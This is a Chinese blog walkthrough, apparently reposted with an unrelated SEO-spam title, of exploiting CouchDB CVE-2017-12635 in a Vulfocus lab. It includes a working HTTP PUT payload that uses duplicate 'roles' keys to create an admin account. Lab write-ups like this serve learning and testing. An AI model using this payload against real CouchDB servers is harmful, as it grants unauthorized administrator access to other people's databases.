您的位置:首页 > 房产 > 建筑 > 优化seo系统_邢台市天气预报_网络游戏推广员的真实经历_长尾词优化外包

优化seo系统_邢台市天气预报_网络游戏推广员的真实经历_长尾词优化外包

2024/12/22 12:33:36 来源:https://blog.csdn.net/2302_80280669/article/details/142363236  浏览:    关键词:优化seo系统_邢台市天气预报_网络游戏推广员的真实经历_长尾词优化外包
优化seo系统_邢台市天气预报_网络游戏推广员的真实经历_长尾词优化外包

本文仅作为学习参考使用,本文作者对任何使用本文进行渗透攻击破坏不负任何责任。

前言:

前文链接:中间件安全(一)

本文主要讲解Couchdb数据库未授权越权漏洞(CVE-2017-12635)。

靶场链接:Vulfocus 漏洞威胁分析平台

一,靶场界面简介。

可以看到开放了三个端口,尝试后发现,仅http://123.58.224.8:35469 可以打开,打开后界面如下:

并无什么有价值的信息。

点击原始数据后,可以发现确实为Couchdb数据库,并且版本为:2.1.0(注意CVE-2017-12635影响版本:小于 1.7.0 以及 小于 2.1.1)。

访问/_utils目录。

couchdb/_utils目录简介:

可以看到,网页自动跳转到登录界面。

二,进行攻击。

随机输入账号密码并使用bp进行抓包。

可以看到,登录失败。

右键,将其发送到重发器。

本漏洞可以绕过创建权限而去实现任意创建admin权限的账号 实现登录。

使用从数据包,正常新建用户:

POST /_session HTTP/1.1
Host: 123.58.224.8:47926
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 94{"type": "user","name": "vulhub","roles": ["_admin"],"password": "vulhub"
}

失败。

使用绕过权限数据包:

PUT /_users/org.couchdb.user:vulhub HTTP/1.1
Host: http://123.58.224.8:47926
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 112{"type": "user","name": "vulhub","roles": ["_admin"],"roles": [],"password": "vulhub"
}

成功。

使用账号密码(vulhub,vulhub)进行测试。

成功。

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com